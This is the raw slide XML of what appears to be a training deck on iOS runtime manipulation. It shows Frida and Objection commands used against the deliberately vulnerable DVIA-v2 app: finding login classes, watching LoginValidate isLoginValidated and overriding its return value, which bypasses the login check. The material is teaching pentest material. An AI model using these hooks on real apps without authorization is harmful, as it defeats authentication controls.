            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>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49920E-2A62-4F7C-B476-FBB7774EA4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="2395002"/>
            <a:ext cx="6620490" cy="3680194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25304101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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 1 : Frida </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>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D385466-3ADF-4B27-847A-7012624599DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457340" y="2364552"/>
            <a:ext cx="7862116" cy="964104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D89B39-612D-4037-937C-32593C3854D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3499052" y="3429000"/>
            <a:ext cx="1778692" cy="3127160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26949446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600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 2 : Objection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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Runtime Manipulation</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128506" y="1915030"/>
            <a:ext cx="7458075" cy="4457700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24662710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t>Option 2 : Objection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Basic command for iOS :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</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hooking</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list</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class_methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> class/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>methods</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</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hooking</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watch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: highlight all calls of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hooking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>override</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> value of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a: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165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just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 2 : Objection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Start Objection : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objection -g "DVIA-v2" explore </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> for all login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</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hooking</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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> classes login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Confirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</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hooking</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watch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoginValidate</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> click on login the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>displayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(agent) [442ynywbod3] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Called</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LoginValidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isLoginValidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>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5186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810838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 2 : Objection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>List arguments/inputs of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> hooking watch method "+[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoginValidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isLoginValidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]" --dump-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --dump-return </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> value of login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> hooking set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "+[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
